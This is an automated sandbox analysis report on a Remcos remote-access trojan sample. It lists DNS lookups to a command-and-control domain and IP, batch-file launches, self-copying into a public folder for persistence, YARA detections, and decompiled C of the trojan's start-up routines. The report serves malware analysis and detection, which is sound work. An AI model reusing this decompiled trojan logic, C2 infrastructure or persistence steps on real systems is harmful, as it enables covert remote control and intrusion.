                                          Jun 4, 2021 09:41:51.975991011 CEST8.8.8.8192.168.2.40xdbc9No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:53.196373940 CEST8.8.8.8192.168.2.40x4dName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:54.265856028 CEST8.8.8.8192.168.2.40x2254No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:55.483614922 CEST8.8.8.8192.168.2.40x80a1Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:56.548612118 CEST8.8.8.8192.168.2.40x4054No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:57.765820980 CEST8.8.8.8192.168.2.40x337aName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:41:58.829729080 CEST8.8.8.8192.168.2.40x7eaeNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:00.037149906 CEST8.8.8.8192.168.2.40x8ef4Name error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:01.081743956 CEST8.8.8.8192.168.2.40x6fbeNo error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:02.300141096 CEST8.8.8.8192.168.2.40xf03cName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:03.358968019 CEST8.8.8.8192.168.2.40x70d4No error (0)nothinglike.ac.ug79.134.225.25A (IP address)IN (0x0001)
                                          Jun 4, 2021 09:42:04.572482109 CEST8.8.8.8192.168.2.40xd48eName error (3)brudfascaqezd.ac.ugnonenoneA (IP address)IN (0x0001)

                                          HTTPS Packets

                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                          Jun 4, 2021 09:39:57.388297081 CEST162.159.130.233443192.168.2.449729CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                          Jun 4, 2021 09:40:30.392745972 CEST162.159.134.233443192.168.2.449755CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                          Jun 4, 2021 09:40:38.192769051 CEST162.159.133.233443192.168.2.449759CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                          Code Manipulations

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: V8IB839cvz.exe PID: 7136 Parent PID: 6068

                                          General

                                          Start time:09:39:53
                                          Start date:04/06/2021
                                          Path:C:\Users\user\Desktop\V8IB839cvz.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\V8IB839cvz.exe'
                                          Imagebase:0x400000
                                          File size:690178 bytes
                                          MD5 hash:10D42F55D89B6FD42404E470E68F1996
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: V8IB839cvz.exe PID: 6584 Parent PID: 7136

                                          General

                                          Start time:09:40:14
                                          Start date:04/06/2021
                                          Path:C:\Users\user\Desktop\V8IB839cvz.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\V8IB839cvz.exe
                                          Imagebase:0x400000
                                          File size:690178 bytes
                                          MD5 hash:10D42F55D89B6FD42404E470E68F1996
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000000.689160997.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: cmd.exe PID: 2228 Parent PID: 7136

                                          General

                                          Start time:09:40:15
                                          Start date:04/06/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: conhost.exe PID: 6200 Parent PID: 2228

                                          General

                                          Start time:09:40:15
                                          Start date:04/06/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: cmd.exe PID: 6540 Parent PID: 2228

                                          General

                                          Start time:09:40:16
                                          Start date:04/06/2021
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
                                          Imagebase:0x11d0000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: conhost.exe PID: 6416 Parent PID: 6540

                                          General

                                          Start time:09:40:16
                                          Start date:04/06/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff724c50000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Chronological Activities

                                          Analysis Process: Xypgtv.exe PID: 6740 Parent PID: 3424

                                          General

                                          Start time:09:40:23
                                          Start date:04/06/2021
                                          Path:C:\Users\Public\Xypgtv\Xypgtv.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\Public\Xypgtv\Xypgtv.exe'
                                          Imagebase:0x400000
                                          File size:690178 bytes
                                          MD5 hash:10D42F55D89B6FD42404E470E68F1996
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.729900326.0000000002410000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.731801392.0000000002444000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.730552799.0000000002444000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.731106098.0000000002444000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.731257935.0000000002444000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.729493553.0000000002428000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.728627251.000000000243C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.731519002.0000000002444000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 41%, ReversingLabs
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: Xypgtv.exe PID: 7004 Parent PID: 3424

                                          General

                                          Start time:09:40:32
                                          Start date:04/06/2021
                                          Path:C:\Users\Public\Xypgtv\Xypgtv.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\Public\Xypgtv\Xypgtv.exe'
                                          Imagebase:0x400000
                                          File size:690178 bytes
                                          MD5 hash:10D42F55D89B6FD42404E470E68F1996
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.749959961.0000000002820000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.749327450.000000000284C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.750252073.0000000002854000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.751417519.0000000002854000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.750787460.0000000002854000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.749703567.0000000002838000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.751016095.0000000002854000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.750523839.0000000002854000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: Xypgtv.exe PID: 6480 Parent PID: 6740

                                          General

                                          Start time:09:40:54
                                          Start date:04/06/2021
                                          Path:C:\Users\Public\Xypgtv\Xypgtv.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\Public\Xypgtv\Xypgtv.exe
                                          Imagebase:0x400000
                                          File size:690178 bytes
                                          MD5 hash:10D42F55D89B6FD42404E470E68F1996
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000000.777883581.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000000.777134487.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000000.776696975.0000000000449000.00000004.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          Chronological Activities

                                          Analysis Process: Xypgtv.exe PID: 6324 Parent PID: 7004

                                          General

                                          Start time:09:41:03
                                          Start date:04/06/2021
                                          Path:C:\Users\Public\Xypgtv\Xypgtv.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\Public\Xypgtv\Xypgtv.exe
                                          Imagebase:0x400000
                                          File size:690178 bytes
                                          MD5 hash:10D42F55D89B6FD42404E470E68F1996
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.795919569.0000000000449000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.797923003.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.796293762.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.798843830.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          Chronological Activities

                                          Disassembly

                                          Code Analysis

                                          Reset < >

                                            Analysis Process: V8IB839cvz.exe PID: 7136 Parent PID: 6068 V8IB839cvz.exeCOMMON

                                            Executed Functions

                                            Non-executed Functions

                                            Function 02214000, Relevance: 5.1, Strings: 4, Instructions: 69COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.645126074.0000000002214000.00000004.00000001.sdmp, Offset: 02214000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: VA$UA$UA$UA
                                            • API String ID: 0-2026754805
                                            • Opcode ID: fd9dfbfb362c70c15eb7dd88d61da2dbc6798bcc93667297291fafeaa6fbfc2e
                                            • Instruction ID: bfbc8981c6ed64c5785cc7c09db9593cee4b6fff7a7d28340d70c742b16ccd86
                                            • Opcode Fuzzy Hash: fd9dfbfb362c70c15eb7dd88d61da2dbc6798bcc93667297291fafeaa6fbfc2e
                                            • Instruction Fuzzy Hash: 882153B4A14B45EFDB14EBE9D444FDCBBE7EB58310F1084A6E40497298C7389980CF18
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: V8IB839cvz.exe PID: 6584 Parent PID: 7136 V8IB839cvz.exeCOMMON

                                            Executed Functions

                                            Function 004096D6, Relevance: 75.3, APIs: 26, Strings: 17, Instructions: 92libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004096D6() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t22;

				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
				 *0x460cb8 = _t2;
				if(_t2 == 0) {
					 *0x460cb8 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x460cb0 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x460cb8 == 0) {
					 *0x460cb0 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x460ca4 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x460e18 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x460e1c = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x460cb4 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
				 *0x460ca8 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x460cbc = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x460cc0 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x460cac = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t22 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x460ca0 = _t22;
				return _t22;
			}






                                            0x004096e9
                                            0x004096f2
                                            0x004096fa
                                            0x00409701
                                            0x00409712
                                            0x00409712
                                            0x0040972d
                                            0x00409732
                                            0x00409743
                                            0x00409743
                                            0x00409761
                                            0x00409775
                                            0x00409789
                                            0x0040979d
                                            0x004097b1
                                            0x004097c5
                                            0x004097d9
                                            0x004097ea
                                            0x004097f2
                                            0x004097f6
                                            0x004097fc

                                            APIs
                                            • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00000000,00461240,00461270,004093DF), ref: 004096E9
                                            • GetProcAddress.KERNEL32(00000000), ref: 004096F2
                                            • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA), ref: 0040970D
                                            • GetProcAddress.KERNEL32(00000000), ref: 00409710
                                            • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW), ref: 00409721
                                            • GetProcAddress.KERNEL32(00000000), ref: 00409724
                                            • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW), ref: 0040973E
                                            • GetProcAddress.KERNEL32(00000000), ref: 00409741
                                            • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00409752
                                            • GetProcAddress.KERNEL32(00000000), ref: 00409755
                                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 00409766
                                            • GetProcAddress.KERNEL32(00000000), ref: 00409769
                                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW), ref: 0040977A
                                            • GetProcAddress.KERNEL32(00000000), ref: 0040977D
                                            • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040978E
                                            • GetProcAddress.KERNEL32(00000000), ref: 00409791
                                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 004097A2
                                            • GetProcAddress.KERNEL32(00000000), ref: 004097A5
                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 004097B6
                                            • GetProcAddress.KERNEL32(00000000), ref: 004097B9
                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 004097CA
                                            • GetProcAddress.KERNEL32(00000000), ref: 004097CD
                                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 004097DE
                                            • GetProcAddress.KERNEL32(00000000), ref: 004097E1
                                            • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 004097EF
                                            • GetProcAddress.KERNEL32(00000000), ref: 004097F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$HandleModule$LibraryLoad
                                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$user32
                                            • API String ID: 551388010-2914448473
                                            • Opcode ID: a26b3501393ecd0b15fb07c8c1352489fcd83b10d16990886eb4cb2741851a20
                                            • Instruction ID: 892aa49e81a9a125c6dbd6d853e51ef56492285ac29356d5687d3298f6a0d7fb
                                            • Opcode Fuzzy Hash: a26b3501393ecd0b15fb07c8c1352489fcd83b10d16990886eb4cb2741851a20
                                            • Instruction Fuzzy Hash: 192136B1E40B587ACA107BB59C6EF3F2D68DA80B527204527F80497192EAFC940CCE5D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040928D, Relevance: 33.5, APIs: 6, Strings: 13, Instructions: 277threadsynchronizationCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			E0040928D(void* __edx, void* __eflags, char* _a12) {
				char _v180;
				char _v200;
				char _v204;
				char _v208;
				char _v236;
				char _v240;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t31;
				long _t45;
				char _t51;
				void* _t52;
				intOrPtr* _t56;
				void* _t66;
				char _t72;
				void* _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t92;
				intOrPtr* _t96;
				void* _t98;
				void* _t103;
				char* _t146;
				int _t152;
				intOrPtr* _t155;
				void* _t173;
				void* _t177;
				intOrPtr* _t178;
				signed int _t184;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t191;
				void* _t192;
				void* _t193;

				_t164 = __edx;
				_push(_t103);
				_push(_t173);
				E00409622( &_v204, __edx, __eflags);
				_t187 = (_t184 & 0xfffffff8) - 0xe4;
				E004020E6(_t103, _t187, __edx, __eflags, 0x461294);
				_t188 = _t187 - 0x18;
				E004020E6(_t103, _t188, __edx, __eflags,  &_v208);
				_t31 = E00411260( &_v236, __edx); // executed
				_t189 = _t188 + 0x30;
				E00409B59(_t31);
				E004031CC( &_v240);
				_t111 = _a12;
				if( *_a12 != 0x2d) {
					L6:
					E004031A1(0x461270, _t164, __eflags, 3);
					E00401FA1(0x461210, _t36, _t173, E00402973(0x461270,  &_v236, E004059DC( &_v264, "Software\\", __eflags, E004031A1(0x461270, _t164, __eflags, 0xe)), __eflags, "\\"));
					E00401F97();
					E00401F97();
					E00401F7D(0x461240, E004031A1(0x461270, _t36, __eflags, 0xe));
					CreateMutexA(0, 1, E00401F2E(0x461240)); // executed
					_t45 = GetLastError();
					__eflags = _t45 - 0xb7;
					if(_t45 == 0xb7) {
						goto L5;
					} else {
						E004096D6();
						GetModuleFileNameW(0, "C:\Users\jones\Desktop\V8IB839cvz.exe", 0x104);
						_t51 = E0041132E(0x461240);
						_push(0x461240);
						_t167 = 0x80000002;
						 *0x460e11 = _t51;
						_t52 = E0040B7C3( &_v256, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
						_t191 = _t189 + 0xc;
						E00401FA1(0x4612ac, 0x80000002, 0x4612ac, _t52);
						E00401F97();
						__eflags =  *0x460e11;
						if( *0x460e11 == 0) {
							_push(" (32 bit)");
						} else {
							_push(" (64 bit)");
						}
						E00403BF5(0x4612ac);
						_t56 =  *0x460cb4;
						__eflags = _t56;
						if(__eflags != 0) {
							 *0x45f9c0 =  *_t56();
						}
						E00409BB0(0x461270, 0x4611e0, E00401F2E(E004031A1(0x461270, _t167, __eflags, 0xb)));
						E004031A1(0x461270, _t167, __eflags, 4);
						E004031A1(0x461270, _t167, __eflags, 5);
						E004031A1(0x461270, _t167, __eflags, 8);
						__eflags =  *((char*)(E00401F2E(E004031A1(0x461270, _t167, __eflags, 3))));
						if(__eflags != 0) {
							_t92 = E00401F2E(E004031A1(0x461270, _t167, __eflags, 0x30));
							_t19 = _t92 + 2; // 0x2
							_t167 = _t19;
							do {
								_t155 =  *_t92;
								_t92 = _t92 + 2;
								__eflags = _t155;
							} while (_t155 != 0);
							__eflags = _t92 - _t167;
							if(__eflags != 0) {
								_t96 = E00401F2E(E004031A1(0x461270, _t167, __eflags, 9));
								_t98 = E00401F2E(E004031A1(0x461270, _t167, __eflags, 0x30));
								_t167 =  *_t96;
								E004053CE(0x461228,  *_t96, _t96, E00411BB3( &_v264,  *_t96, _t98));
								E004031D1();
							}
						}
						_push(1);
						_t66 = E00401F2E(E004031A1(0x461270, _t167, __eflags, 0x34));
						_t192 = _t191 - 0x18;
						E0040207E(0x461270, _t192, _t66);
						_push("licence");
						_t168 = E00401F2E(0x461210); // executed
						E0040B917(0x461210, _t68); // executed
						_t193 = _t192 + 0x20;
						_t72 = E00432099(_t70, E00401F2E(E004031A1(0x461270, _t68, __eflags, 0x28)));
						_t177 = CreateThread;
						 *0x460a94 = _t72;
						__eflags = _t72 - 2;
						if(_t72 != 2) {
							__eflags = _t72 - 1;
							if(__eflags == 0) {
								_t152 = 0;
								__eflags = 0;
								goto L21;
							}
						} else {
							_t152 = 1;
							L21:
							E00412729(0x461270, _t152, _t168);
							CreateThread(0, 0, E004124F8, 0, 0, 0);
						}
						_t73 = E00410C6E( &_v256, 0, __eflags); // executed
						E004053CE(0x46127c, _t168, _t177, _t73);
						_t146 =  &_v260;
						E004031D1();
						_t76 =  *0x460ca8;
						__eflags = _t76;
						if(_t76 != 0) {
							 *_t76(0); // executed
						}
						CreateThread(0, 0, E00409834, 0, 0, 0);
						_t78 =  *0x45f9c0; // 0x1
						_t79 = _t78;
						__eflags = _t79;
						if(__eflags == 0) {
							_push("User");
							goto L28;
						} else {
							__eflags = _t79 - 1;
							if(__eflags == 0) {
								_push("Administrator");
								L28:
								E004059B8(0x461270, _t193 - 0x18, "Access level: ", 0, __eflags, E0040207E(0x461270,  &_v260));
								E0040207E(0x461270, _t193 - 4, "[Info]");
								E00410B51(0x461270);
								_t146 =  &_v268;
								E00401F97(); // executed
							}
						}
						E0040C730(); // executed
						asm("int3");
						_push(_t177);
						_t178 = _t146 + 0x68;
						E00409BE5(0x461270, _t178);
						_t111 = _t178;
						 *_t111 = 0x45ae18;
						 *_t111 = 0x455f54;
						return E00429C96(_t111);
					}
				} else {
					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
					if(__eflags != 0) {
						goto L6;
					} else {
						__eax =  *(__ecx + 2) & 0x000000ff;
						__eflags = __al;
						if(__eflags != 0) {
							goto L6;
						} else {
							_push(__ecx);
							_push(__ecx);
							__ecx =  &_v180;
							__eax = E00409C14( &_v180, __edx, __eflags, "licence_code.txt", 2);
							__ecx = 0x461270;
							__ecx = E004031A1(0x461270, __edx, __eflags, 0x34);
							__edx = __eax;
							__ecx =  &_v200;
							__eax = E0040AF9D( &_v200, __edx, __eflags);
							__ecx =  &_v200;
							__eax = E00409BC5( &_v200, __edx, __eflags);
							__ecx =  &_v200;
							L30();
							L5:
							E00401F97();
							__eflags = 1;
							return 1;
						}
					}
				}
			}













































                                            0x0040928d
                                            0x0040929d
